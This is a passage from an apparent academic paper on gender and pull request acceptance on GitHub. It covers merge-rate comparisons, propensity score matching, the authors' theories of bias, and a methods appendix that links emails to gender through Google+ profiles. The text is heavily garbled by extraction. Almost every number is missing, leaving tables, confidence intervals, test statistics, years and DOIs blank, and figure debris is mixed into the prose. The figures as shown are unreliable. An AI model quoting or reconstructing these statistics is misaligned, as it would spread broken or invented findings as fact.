linking email addresses to gender is a privacy violation of their users; they responded that it is consistent with google’s terms of service (https://sites.google.com/site/ bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address). third, to protect the identities of the people described in this study to the extent possible, we do not plan to release our data that links github users to genders. results we describe our results in this section; data is available in supplemental files. are women’s pull requests less likely to be accepted? we hypothesized that pull requests made by women are less likely to be accepted than those made by men. prior work on gender bias in hiring—that a job application with a woman’s name is evaluated less favorably than the same application with a man’s name (moss-racusin et al., )—suggests that this hypothesis may be true. to evaluate this hypothesis, we looked at the pull status of every pull request submitted by women compared to those submitted by men. we then calculate the merge rate and corresponding confidence interval, using the clopper–pearson exact method (clopper & pearson, ), and find the following: gender open closed merged merge rate % confidence interval women , , , . % [ . %, . %] men , , , , . % [ . %, . %] the hypothesis is not only false, but it is in the opposite direction than expected; women tend to have their pull requests accepted at a higher rate than men! this difference is statistically significant (χ (df = ,n= , , )= , ,p<. ). what could explain this unexpected result? open source effects perhaps our github data are not representative of the open source community; while all projects we analyzed were public, not all of them are licensed as open source. nonetheless, if we restrict our analysis to just projects that are explicitly licensed as open source, women continue to have a higher acceptance rate (χ (df = ,n= , , )= ,p<. ): terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://sites.google.com/site/bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address https://sites.google.com/site/bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. gender open closed merged merge rate % confidence interval women , , , . % [ . %, . %] men , , , , . % [ . %, . %] insider effects perhaps women’s high acceptance rate is because they are already well known in the projects they make pull requests in. pull requests can be made by anyone, including both insiders (explicitly authorized owners and collaborators) and outsiders (other github users). if we exclude insiders from our analysis, the women’s acceptance rate ( . % [ . %, . %]) continues to be significantly higher than men’s ( . % [ . %, . %]) (χ (df = ,n= , , )= ,p<. ). experience effects perhaps only a few highly successful and prolific women, responsible for a substantial part of overall success, are skewing the results. to test this, we calculated the pull request acceptance rate for each woman and man with or more pull requests, then found the average acceptance rate across those two groups. the results are displayed in fig. . we notice that women tend to have a bimodal distribution, typically being either very successful (> % acceptance rate) or unsuccessful (< %). but these data tell the same story as the overall acceptance rate; women are more likely than men to have their pull requests accepted. why might women have a higher acceptance rate than men, given the gender bias documented in the literature? in the remainder of this section, we will explore this question by evaluating several hypotheses that might explain the result. do women’s pull request acceptance rates start low and increase over time? one plausible explanation is that women’s first few pull requests get rejected at a disproportionate rate compared to men’s, so they feel dejected and do not make future pull requests. this explanation is supported by reagle’s account of women’s participation in virtual collaborative environments, where an aggressive argument style is necessary to justify one’s own contributions, a style that many women may find to be not worthwhile (reagle, ). thus, the overall higher acceptance rate for women would be due to survivorship bias within github; the women who remain and do the majority of pull requests would be better equipped to contribute, and defend their contributions, than men. thus, we might expect that women have a lower acceptance rate than men for early pull requests but have an equivalent acceptance rate later. to evaluate this hypothesis, we examine pull request acceptance rate over time, that is, the mean acceptance rate for developers on their first pull request, second pull request, and so on. figure displays the results. orange points represent the mean acceptance rate for women, and purple points represent acceptance rates for men. shaded regions indicate the pointwise % clopper–pearson confidence interval. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % % % % % % % % o f w o m e n women % % % % % % % % % % % o f m e n men acceptance rate a b figure histogram of mean acceptance rate per developer for women (mean . %, median . %) and men (mean . %, median . %). while developers making their initial pull requests do get rejected more often, women generally still maintain a higher rate of acceptance throughout. the acceptance rate of women tends to fluctuate at the right of the graph, because the acceptance rate is affected by only a few individuals. for instance, at pull requests, only women are represented. intuitively, where the shaded region for women includes the corresponding data point for men, the reader can consider the data too sparse to conclude that a substantial difference exists between acceptance rates for women and men. nonetheless, between and pull requests, women’s higher acceptance rate remains. thus, the evidence casts doubt on our hypothesis. are women focusing their efforts on fewer projects? one possible explanation for women’s higher acceptance rates is that they are focusing their efforts more than men; perhaps their success is explained by doing pull requests on few projects, whereas men tend to do pull requests on more projects. first, the data do terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ●● ●● ●● ●●● ●●● ●●● ●●● ●● ●●● ●●●●●● ●●●●●●●●●● ●●●● ●●●●●● ●●● ●●●●●● ●●●●●● ●●●●●●●● ●●●●●●● ●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ●●● ● ● ●● ●● ●● ●● ●●● ● ●●● ● ●●●● ● ● ● ● ●● ●● ●●● ● ●● ● ●● ●● ●●● ●● ●●●●●● ●●● ●● ●●● ●● ●●● ● ● ●● ● ●●●●● ● ● ●● ● ●● ● ●●●● ●●●●●● ●●● % % % % pull requests a cc e p ta n ce r a te ●● ●● women men figure pull request acceptance rate over time. suggest that women tend to contribute to fewer projects than men. while the median number of projects contributed to via pull request is for both genders (that is, the th percentile of developers); at the th percentile it is for women and for men, and at the th percentile it is for women and for men. but the fact that women tend to contribute to fewer projects does not explain why women tend to have a higher acceptance rate. to see why, consider fig. ; on the y axis is mean acceptance rate by gender, and on the x axis is number of projects contributed to. when contributing to between and projects, women have a higher acceptance rate as they contribute to more projects. beyond projects, the % confidence interval indicates women’s data are too sparse to draw conclusions confidently. are women making pull requests that are more needed? another explanation for women’s pull request acceptance rate is that, perhaps, women disproportionately make contributions that projects need more specifically. what makes a contribution ‘‘needed’’ is difficult to assess from a third-party perspective. one way is to look at which pull requests link to issues in projects’ github issue trackers. if a pull request references an issue, we consider it to serve a more specific and recognized need than an otherwise comparable one that does not. to support this argument with data, we randomly selected pull request descriptions that referenced issues; in cases, the reference was terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● % % % % projects contributed to a cc e p ta n ce r a te ●● ●● women men figure pull request acceptance rate by number of projects contributed to. an attempt to fix all or part of an issue. based on this high probability, we can assume that when someone references an issue in a pull request description, they usually intend to fix a specific problem in the project. thus, if women more often submit pull requests that address an documented need and this is enough to improve acceptance rates, we would expect that these same requests are more often linked to issues. we evaluate this hypothesis by parsing pull request descriptions and calculating the percentage of pulls that reference an issue. to eliminate projects that do not use issues or do not customarily link to them in pull requests, we analyze only pull requests in projects that have at least one linked pull request. here are the results: gender without reference with reference % % confidence interval women , , . % [ . %, . %] men , , , . % [ . %, . %] this data show a statistically significant difference (χ (df = ,n= , , )= , p<. ). contrary to the hypothesis, women are slightly less likely to submit a pull request that mentions an issue, suggesting that women’s pull requests are less likely to fulfill an documented need. note that this does not imply women’s pull requests are less valuable, terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. but instead that the need they fulfill appears less likely to be recognized and documented before the pull request was created. regardless, the result suggests that women’s increased success rate is not explained by making more specifically needed pull requests. are women making smaller changes? maybe women are disproportionately making small changes that are accepted at a higher rate because the changes are easier for project owners to evaluate. this is supported by prior work on pull requests suggesting that smaller changes tend to be accepted more than larger ones (gousios, pinzger & deursen, ). we evaluated the size of the contributions by analyzing lines of code, modified files, and number of commits included. the following table lists the median and mean lines of code added, removed, files changed, and commits across , , pull requests: lines added lines removed files changed commits women median mean , . . men median mean , . . t-test statistic . . . . df , , , , p <. . . <. ci [ . , . ] [ . , ] [− . , . ] [ . , . ] the bottom of this chart includes welch’s t-test statistics, comparing women’s and men’s metrics, including % confidence intervals for the mean difference. for three of four measures of size, women’s pull requests are significantly larger than men’s. one threat to this analysis is that lines added or removed may exaggerate the size of a change whenever a refactoring is performed. for instance, if a developer moves a , -line class from one folder to another, even though the change may be relatively benign, the change will show up as , lines added and , lines removed. although this threat is difficult to mitigate definitively, we can begin to address it by calculating the net change for each pull request as the number of added lines minus the number of removed lines. here is the result: net lines changed women median mean men median mean t-test statistic . df , p <. ci [ . , . ] terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this difference is also statistically significant. so even in the face of refactoring, the conclusion holds: women make pull requests that add and remove more lines of code, and contain more commits. this is consistent with larger changes women make on wikipedia (antin et al., ). are women’s pull requests more successful when contributing code? one potential explanation for why women get their pull requests accepted more often is that the kinds of changes they make are different. for instance, changes to html could be more likely to be accepted than changes to c code, and if women are more likely to change html, this may explain our results. thus, if we look only at acceptance rates of pull requests that make changes to program code, women’s high acceptance rates might disappear. for this, we define program code as files that have an extension that corresponds to a turing-complete programming language. we categorize pull requests as belonging to a single type of source code change when the majority of lines modified were to a corresponding file type. for example, if a pull request changes lines in .js (javascript) files and lines in .html files, we include that pull request and classify it as a .js change. figure shows the results for the most common programming language files (fig. a) and the most common non-programming language files (fig. b). each pair of bars summarizes pull requests classified as part of a programming language file extension, where the height of each bar represents the acceptance rate and each bar contains a % clopper–pearson confidence interval. an asterisk (*) next to a language indicates a statistically significant difference between men and women for that language using a chi-squared test, after a benjamini–hochberg correction (benjamini & hochberg, ) to control for false discovery. overall, we observe that women’s acceptance rates are higher than men’s for almost every programming language. the one exception is .m, which indicates objective-c and matlab, for which the difference is not statistically significant. is a woman’s pull request accepted more often because she appears to be a woman? another explanation as to why women’s pull requests are accepted at a higher rate would be what mcloughlin calls type iii bias: ‘‘the singling out of women by gender with the intention to help’’ (mcloughlin, ). in our context, project owners may be biased towards wanting to help women who submit pull requests, especially outsiders to the project. in contrast, male outsiders without this benefit may actually experience the opposite effect, as distrust and bias can be stronger in stranger-to-stranger interactions (landy, ). thus, we expect that women who can be perceived as women are more likely to have their pull requests accepted than women whose gender cannot be easily inferred, especially when compared to male outsiders. we evaluate this hypothesis by comparing pull request acceptance rate of developers who have gender-neutral github profiles and those who have gendered github profiles. we define a gender-neutral profile as one where a gender cannot be readily inferred from their profile. figure gives an example of a gender-neutral github user, ‘‘akofink’’, who terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % .js * .rb * .py * .java * .php * .cpp * .cs * .c * .go * .m a cc e p ta n ce r a te women men % % % % .md .html * .xml .json * .css * .txt * .yml .rst * .markdown .podspec a cc e p ta n ce r a te a b figure pull request acceptance rate by file type, for programming languages (a) and non- programming languages (b). uses an identicon, an automatically generated graphic, and does not have a gendered name that is apparent from the login name. likewise, we define a gendered profile as one where the gender can be readily inferred from the image or the name. figure also gives an example of a gendered profile; the profile of ‘‘justinamiddleton’’ is gendered because it uses a login name (justin) commonly associated with men, and because the image depicts a person with masculine features (e.g., pronounced brow ridge (brown & perrett, )). clicking on a user’s name in pull requests reveals their profile, which may contain more information such as a user-selected display name (like ‘‘justin middleton’’). identifiable analysis to obtain a sample of gendered and gender-neutral profiles, we used a combination of automated and manual techniques. for gendered profiles, we included github users who used a profile image rather than an identicon and that vasilescu and colleagues’ tool could confidently infer a gender from the user’s name (vasilescu, capiluppi & serebrenik, ). terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % gender−neutral gendered a cc e p ta n ce r a te insiders gender−neutral gendered women men outsiders a b figure pull request acceptance rate by gender and perceived gender, with % clopper–pearson confidence intervals, for insiders (a) and outsiders (b). for gender-neutral profiles, we included github users that used an identicon, that the tool could not infer a gender for, and that a mixed-culture panel of judges could not guess the gender for. while acceptance rate results so far have been robust to differences between insiders (people who are owners or collaborators of a project) versus outsiders (everyone else), for this analysis, there is a substantial difference between the two, so we treat each separately. figure shows the acceptance rates for men and women when their genders are identifiable versus when they are not, with pull requests submitted by insiders on the left and pull requests submitted by outsiders on the right. identifiable results for insiders, we observe little evidence of bias when we compare women with gender-neutral profiles and women with gendered profiles, since both have similar acceptance rates. this can be explained by the fact that insiders likely know each other to some degree, since they are all authorized to make changes to the project, and thus may be aware of each others’ gender. for outsiders, we see evidence for gender bias: women’s acceptance rates drop by . % when their gender is identifiable, compared to when it is not (χ (df = ,n= , )= ,p <. ). there is a smaller . % drop for men (χ (df = ,n= , )= ,p < . ). women have a higher acceptance rate of pull requests overall (as we reported earlier), but when they are outsiders and their gender is identifiable, they have a lower acceptance rate than men. are acceptance rates different if we control for covariates? in analyses of pull request acceptance rates up until this point, covariates other than the variable of interest (gender) may also contribute to acceptance rates. we have previously terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. shown an imbalance in covariate distributions for men and women (e.g., number of projects contributed to and number of changes made) and this imbalance may confound the observed gender differences. in this section, we re-analyze acceptance rates while controlling for these potentially confounding covariates using propensity score matching, a technique that supports causal inference by transforming a dataset from a non-randomized field study into a dataset that ‘‘looks closer to one that would result from a perfectly blocked (and possibly randomized) experiment’’ (ho et al., ). that is, by making gender comparisons between subjects having the same propensity scores, we are able to remove the confounding effects, giving stronger evidence that any observed differences are primarily due to gender bias. while full details of the matching procedure can be found in the appendix, in short, propensity score matching works by matching data from one group to similar data in another group (in our case, men’s and women’s pull requests), then discards the data that do not match. this discarded data represent outliers, and thus the results from analyzing matched data may differ substantially from the results from analyzing the original data. the advantage of propensity score matching is that it controls for any differences we observed earlier that are caused by a measured covariate, rather than gender bias. one negative side effect of matching is that statistical power is reduced because the matched data are smaller than from the original dataset. we may also observe different results than in the larger analysis because we are excluding certain subjects from the population having atypical covariate value combinations that could influence the effects in the previous analyses. figure shows acceptance using matched data for all pull requests, for just pull requests from outsiders, and for just pull requests on projects that are open source (oss) licenses. asterisks (*) indicate that each difference is statistically significant using a chi-squared test, though the magnitude of the difference between men and women is smaller than for unmatched data. figure shows acceptance rates for matched data, analogous to fig. . we calculate statistical significance with a chi-squared test, with a benjamini–hochberg correction (benjamini & hochberg, ). for programming languages, acceptance rates for three (ruby, python, and c ++) are significantly higher for women, and one (php) is significantly higher for men. figure shows acceptance rates for matched data by pull request index, that is, for each user’s first pull request, second and third pull request, fourth through seventh pull request, and so on. we perform chi-squared tests and benjamini–hochberg corrections here as well. compared to fig. , most differences between genders diminish to the point of non-statistical significance. from fig. , we might hypothesize that the overall difference in acceptance rates between genders is due to just the first pull request. to examine this, we separate the pull request acceptance rate into: • one-timers: pull requests from people who only ever submit one pull request. • regulars’ first: first pull requests from people who go on to submit other pull requests. • regulars’ rest: all other (second and beyond) pull requests. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for the sake of completeness, the result of that matching process is included in the supplemental files. % % % % all * outsiders * oss * a cc e p ta n ce r a te women men figure acceptance rates for men and women for all data, outsiders, and open source projects using matched data. figure shows the results. overall, women maintain a significantly higher acceptance rate beyond the first pull request, disconfirming the hypothesis. we next investigate acceptance rate by gender and perceived gender using matched data. here we match slightly differently, matching on identifiability (gendered, unknown, or neutral) rather than use of an identicon. unfortunately, matching on identifiability (and the same covariates described in this section) reduces the sample size of gender neutral pulls by an order of magnitude, substantially reducing statistical power. consequently, here we relax the matching criteria by broadening the equivalence classes for numeric variables. figure plots the result. for outsiders, while men and women perform similarly when their genders are neutral, when their genders are apparent, men’s acceptance rate is . % higher than women’s (χ (df = ,n= , )= ,p<. ). how has this matched analysis of the data changed our findings? our observation about overall acceptance rates being higher for women remains, although the difference is smaller. our observation about womens’ acceptance rates being higher than mens’ for all programming languages is now mixed; instead, women’s acceptance rate is significantly higher for three languages, but significantly lower for one language. our observation that womens’ acceptance rates continue to outpace mens’ becomes less clear. finally, for outsiders, although gender-neutral women’s acceptance rates no longer outpace men’s to a terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % .js .rb * .py * .java .php * .cpp * .cs .c .go .m a cc e p ta n ce r a te women men % % % % .md .html * .xml * .json .txt .yml .rst .markdown .podspec a cc e p ta n ce r a te women men a b figure acceptance rates for men and women using matched data by file type for programming lan- guages (a) and non-programming languages (b). statistically significant extent, men’s pull requests continue to be accepted more often than women’s when the contributor’s gender is apparent. discussion why do differences exist in acceptance rates? to summarize this paper’s observations: . women are more likely to have pull requests accepted than men. . women continue to have high acceptance rates as they do pull requests on more projects. . women’s pull requests are less likely to serve an documented project need. . women’s changes are larger. . women’s acceptance rates are higher for some programming languages. . men outsiders’ acceptance rates are higher when they are identifiable as men. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % − prs * − prs − prs − prs − prs − prs − prs a cc e p ta n ce r a te women men figure pull request acceptance rate over time using matched data. we next consider several alternative theories that may explain these observations as a whole. given observations – , one theory is that a bias against men exists, that is, a form of reverse discrimination. however, this theory runs counter to prior work (e.g., nafus, ), as well as observations . another theory is that women are taking fewer risks than men. this theory is consistent with byrnes’ meta-analysis of risk-taking studies, which generally find women are more risk-averse than men (byrnes, miller & schafer, ). however, this theory is not consistent with observation , because women tend to change more lines of code, and changing more lines of code correlates with an increased risk of introducing bugs (mockus & weiss, ). another theory is that women in open source are, on average, more competent than men. in lemkau’s review of the psychology and sociology literature, she found that women in male-dominated occupations tend to be highly competent (lemkau, ). this theory is consistent with observations – . to be consistent with observations , we need to explain why women’s pull request acceptance rate drops when their gender is apparent. an addition to this theory that explains observation , and the anecdote described in the introduction, is that discrimination against women does exist in open source. assuming this final theory is the best one, why might it be that women are more competent, on average? one explanation is survivorship bias: as women continue their formal and informal education in computer science, the less competent ones may change terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % one−timers regulars' first regulars' rest * a cc e p ta n ce r a te women men figure acceptance rates for men and women broken down by category. % % % % gender−neutral * gendered a cc e p ta n ce r a te insiders gender−neutral gendered * women men outsiders a b figure pull request acceptance rate by gender and perceived gender, using matched data. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. calculated using the chies function in the compute.es r package (https://cran.r- project.org/web/packages/compute.es/ compute.es.pdf). fields or otherwise drop out. then, only more competent women remain by the time they begin to contribute to open source. in contrast, less competent men may continue. while women do switch away from stem majors at a higher rate than men, they also have a lower drop out rate then men (chen, ), so the difference between attrition rates of women and men in college appears small. another explanation is self-selection bias: the average woman in open source may be better prepared than the average man, which is supported by the finding that women in open source are more likely to hold master’s and phd degrees (arjona-reina, robles & dueas, ). yet another explanation is that women are held to higher performance standards than men, an explanation supported by gorman & kmec ( ) analysis of the general workforce, as well as heilman and colleagues’ ( ) controlled experiments. are the differences meaningful? we have demonstrated statistically significant differences between men’s and women’s pull request acceptance rates, such as that, overall, women’s acceptance rates are . % higher than men’s. we caution the reader from interpreting too much from statistical significance; for big data studies such as this one, even small differences can be statistically significant. instead, we encourage the reader to examine the size of the observed effects. we next examine effect size from two different perspectives. using our own data, let us compare acceptance rate to two other factors that correlate with pull request acceptance rates. first, the slope of the lines in fig. , indicate that, generally, as developers become more experienced, their acceptance rates increases fairly steadily. for instance, as experience doubles from to pull requests for men, pull acceptance rate increases by . %. second, the larger a pull request is, the less likely it is to be accepted (gousios, pinzger & deursen, ). in our pull request data, for example, increasing the number of files changed from to decreases the acceptance rate by . %. using others’ data, let us compare our effect size to effect sizes reported in other studies of gender bias. davison and burke’s meta-analysis of sex discrimination found an average pearson correlation of r = . , a standardized effect size that represents the linear dependence between gender and job selection (davison & burke, ). in comparison, our . % overall acceptance rate difference is equivalent to r = . . thus, the effect we have uncovered is only about a quarter of the effect in typical studies of gender bias. conclusion in closing, as anecdotes about gender bias persist, it is imperative that we use big data to better understand the interaction between genders. while our big data study does not prove that differences between gendered interactions are caused by bias among individuals, combined with qualitative data about bias in open source (nafus, ), the results are troubling. our results show that women’s pull requests tend to be accepted more often than men’s, yet women’s acceptance rates are higher only when they are not identifiable as women. in the context of existing theories of gender in the workplace, plausible explanations include terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://peerj.com http://dx.doi.org/ . /peerj-cs. the presence of gender bias in open source, survivorship and self-selection bias, and women being held to higher performance standards. while bias can be mitigated—such as through ‘‘bias busting’’ workshops (http: //www.forbes.com/sites/ellenhuet/ / / /rise-of-the-bias-busters-how-unconscious- bias-became-silicon-valleys-newest-target), open source codes of conduct (http: //contributor-covenant.org) and blinded interviewing (https://interviewing.io)— the results of this paper do not suggest which, if any, of these measures should be adopted. more simply, we hope that our results will help the community to acknowledge that biases are widespread, to reevaluate the claim that open source is a pure meritocracy, and to recognize that bias makes a practical impact on the practice of software development. acknowledgements special thanks to denae ford for her help throughout this research project. thanks to the developer liberation front for their reviews of this paper. for their helpful discussions, thanks to tiffany barnes, margaret burnett, tim chevalier, aaron clauset, julien couvreur, prem devanbu, ciera jaspan, saul jaspan, david jones, jeff leiter, ben livshits, titus von der malsburg, peter rigby, david strauss, bogdan vasilescu, and mikael vejdemo- johansson. for their helpful critiques during the peer review process, thanks to lynn conway, caroline simard, and the anonymous reviewers. appendix: materials and methods github scraping an initial analysis of ghtorrent pull requests showed that our pull request merge rate was significantly lower than that presented in prior work on pull requests (gousios, pinzger & deursen, ). we found a solution to the problem that calculated pull request status using a different technique, which yielded a pull request merge rate comparable to prior work. however, in a manual inspection of pull requests, we noticed that several calculated pull request statuses were different than the statuses indicated on the http://github.com website. as a consequence, we wrote a web scraping tool that automatically downloaded the pull request html pages, parsed them, and extracted data on status, pull request message, and comments on the pull request. we performed this process for all pull requests submitted by github users that we had labeled as either a man or woman. in the end, the pull request acceptance rate was . % for all processed pull requests. we determined whether a pull requestor was an insider or an outsider during our scraping process because the data was not available in the ghtorrent dataset. we classified a user as an insider when the pull request explicitly listed the person as a collaborator or owner (https://help.github.com/articles/what-are-the-different-access-permissions/#user- accounts), and classified them as an outsider otherwise. this analysis has inaccuracies because github users can change roles from outsider to insider and vice-versa. as an example, about . % of merged pull requests from both outsider female and male users weremergedby theoutsiderpull-requestorthemselves, whichisnotpossible, sinceoutsiders terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.forbes.com/sites/ellenhuet/ / / /rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://www.forbes.com/sites/ellenhuet/ / / /rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://www.forbes.com/sites/ellenhuet/ / / /rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://contributor-covenant.org http://contributor-covenant.org https://interviewing.io http://github.com https://help.github.com/articles/what-are-the-different-access-permissions/#user-accounts https://help.github.com/articles/what-are-the-different-access-permissions/#user-accounts http://dx.doi.org/ . /peerj-cs. by definition do not have the authority to self-merge. we emailed such an outsider, who indicated that, indeed, she was an insider when she made that pull request. we attempted to mitigate this problem by using a technique similar to that used in prior work (gousios, pinzger & deursen, ; yu et al., ). from contributors that we initially marked as outsiders, for a given pull request on a project, we instead classified them as insiders when they met any of three conditions. the first condition was that they had closed an issue on the project within days prior to opening the given pull request. the second condition was that they had merged the given pull request or any other pull request on the project in the prior days. the third condition was that they had closed any pull request that someone else had opened in the prior days. meeting any of these conditions implies that, even if the contributor was an outsider at the time of our scraping, they were probably an insider at the time of the pull request. gender linking to evaluate gender bias on github, we first needed to determine the genders of github users. our technique uses several steps to determine the genders of github users. first, from the ghtorrent data set, we extract the email addresses of github users. second, for each email address, we use the search engine in the google+ social network to search for users with that email address. the search works for both google users’ email addresses (@gmail.com), as well as other email addresses (such as @ncsu.edu). third, we parse the returned users’ ‘about’ page to scrape their gender. finally, we include only the genders ‘male’ and ‘female’ ( , users who make pull requests) because there were relatively few other options chosen ( users). we also automated and parallelized this process. this technique capitalizes on several properties of the google+ social network. first, if a google+ user signed up for the social network using an email address, the search results for that email address will return just that user, regardless of whether that email address is publicly listed or not. second, signing up for a google account currentlyrequires you to specify a gender (though ‘other’ is an option) (https://accounts.google.com/signup), and, in our discussion, we interpret their use of ‘male’ and ‘female’ in gender identification (rather than sex) as corresponding to our use of the terms ‘man’ and ‘woman’. third, when google+ was originally launched, gender was publicly visible by default (http://latimesblogs.latimes.com/technology/ / /google- plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html). merged pull requests throughout this study, we measure pull requests that are accepted by calculating developers’ merge rates, that is, the number of pull requests merged divided by the sum of the number of pull requests merged, closed, and still open. we include pull requests still open in the denominator in this calculation because pull requests that are still open could be indicative of a pull requestor being ignored, which has the same practical impact as rejection. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com mailto:@gmail.com mailto:@ncsu.edu https://accounts.google.com/signup http://latimesblogs.latimes.com/technology/ / /google-plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html http://latimesblogs.latimes.com/technology/ / /google-plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html http://dx.doi.org/ . /peerj-cs. this tool was builds on vasilescu and colleagues’ tool (vasilescu, capiluppi & serebrenik, ), but we removed some of vasilescu and colleagues’ heuristics to be more conservative. our version of the tool can be found here: https: //github.com/developerliberationfront/ gendercomputer. project licensing to determine whether a project uses an open source license, we used an experimental github api that uses heuristics to determine a project’s license (https://developer.github. com/v /licenses/). we classified a project (and thus the pull request on that project) as open source if the api reported a license that the open source initiative considers in compliance with the open source definition (https://opensource.org/licenses), which were afl- . , agpl- . , apache- . , artistic- . , bsd- -clause, bsd- -clause, epl- . , eupl- . , gpl- . , gpl- . , isc, lgpl- . , lgpl- . , mit, mpl- . , ms-pl, ms-rl, ofl- . , and osl- . . projects were not considered open source if the api did not return a license for a project, or the license was bsd- -clause-clear, cc-by- . , cc-by-sa- . , cc - . , other, unlicense, or wtfpl. determining gender neutral and gendered profiles to determine gendered profiles, we first parsed github profile pages to determine whether each user was using a profile image or an identicon. of the users who performed at least one pull request, , used a profile image and , used an identicon. we then ran display names and login names through a gender inference program, which maps a name to a gender. we classified a github profile as gendered if each of the following were true: • a profile image (rather than an identicon) was used, and • the gender inference tool output a gender at the highest level of confidence (that is, ‘male’ or ‘female,’ rather than ‘mostly male,’ ‘mostly female,’ or ‘unknown’). we classified profile images as identicons using imagemagick (http://www.graphicsmagick.org/graphicsmagick.html), looking for an identicon-specific file size, image dimension, image class, and color depth. in an informal inspection into profile images, we found examples of non-photographic images that conveyed gender cues, so we did not attempt to distinguish between photographic and non-photographic images when classifying profiles as gendered. to classify profiles as gender neutral, we added a manual step. given a github profile that used an identicon (thus, a gender could not be inferred from a profile image) and a name that the gender inference tool classified as ‘unknown’, we manually verified that the profile could not be easily identified as belonging to a specific gender. we did this in two phases. in the first phase, we assembled a panel of people to evaluate profiles for s each. the panelists were a convenience sample of graduate and undergraduate students from north carolina state university. panelists were of american (man), chinese (man), and indian (woman) origin, representative of the three most common nationalities on github. we used different nationalities because we wanted the panel to be able to identify, if possible, the genders of github usernames with different cultural origins. in the second phase, we eliminated two inefficiencies from the first phase: (a) because the first panel estimated that for % of profiles, they only looked at login names and display names, we only showed this information to the second panel, and (b) because the first panel found s was usually more time than was necessary to assess gender, we allowed panelists at the second phase to assess names at their own pace. across both phases, panelists were instructed to signal if they could identify the gender of the github profile. to estimate terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/developerliberationfront/gendercomputer https://github.com/developerliberationfront/gendercomputer https://github.com/developerliberationfront/gendercomputer https://peerj.com https://developer.github.com/v /licenses/ https://developer.github.com/v /licenses/ https://opensource.org/licenses http://www.graphicsmagick.org/graphicsmagick.html http://dx.doi.org/ . /peerj-cs. panelists’ confidence, we considered using a threshold like ‘‘ % confident of the gender,’’ but found that this was too ambiguous in pilot panels. instead, we instructed panelists to signal if they would be comfortable addressing the github user as ‘mister’ or ‘miss’ in an email, given the only thing they knew about the user was their profile. we considered a github profile as gender neutral if all of the following conditions were met: • an identicon (rather than a profile image) was used, • the gender inference tool output a ‘unknown’ for the user’s login name and display name, and • none of the panelists indicated that they could identify the user’s gender. rather than asking a panel to laboriously evaluate every profile for which the first two criteria applied, we instead asked panelists to inspect a random subset. across both panels, panelists inspected , profiles of roughly equal numbers of women and men. we chose the number , by doing a rough statistical power analysis using the results of the first panel to determine how many profiles panelists should inspect during the second panel to obtain statistically significant results. of the , , panelists eliminated profiles for which at least one panelist could infer a gender. matching procedure to enable more confident causal inferences about the effect of gender, we used propensity score matching to remove the effect of confounding factors from our acceptance rate analyses. in our analyses, we used men as the control group and women as the treatment group. we treated each pull request as a data point. the covariates we matched were number of lines added, number of lines removed, number of commits, number of files changed, pull index (the creator’s nth pull request), number of references to issues, license (open source or not), creator type (owner, collaborator, or outsider), file extension, and whether the pull requestor used an identicon. we excluded pull requests for which we were missing data for any covariate. we used the r library matchit (ho et al., ). although matchit offers a variety of matching techniques, such as full matching and nearest neighbor, we found that only the exact matching technique completed the matching process, due to our large number of covariates and data points. with exact matching, each data point in the treatment group must match exactly with one or more data points in the control group. this presents a problem for covariates with wide distributions (such as lines of code) because it severely restricts the technique’s ability to find matches. for instance, if a woman made a pull request with lines added and a man made a pull request with lines added that was otherwise identical (same number of lines removed, same file extension, and so on), these two data points would not be matched and excluded from further analysis. consequently, we pre-processed each numerical variable into the floor of the log of it. thus, for example, both and are transformed into , and thus can be exactly matched. after exact matching, the means of all covariates are balanced, that is, their weighted means are equal across genders. raw numerical data, since we transformed it, is not terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. perfectly balanced, but is substantially more balanced than the original data; each 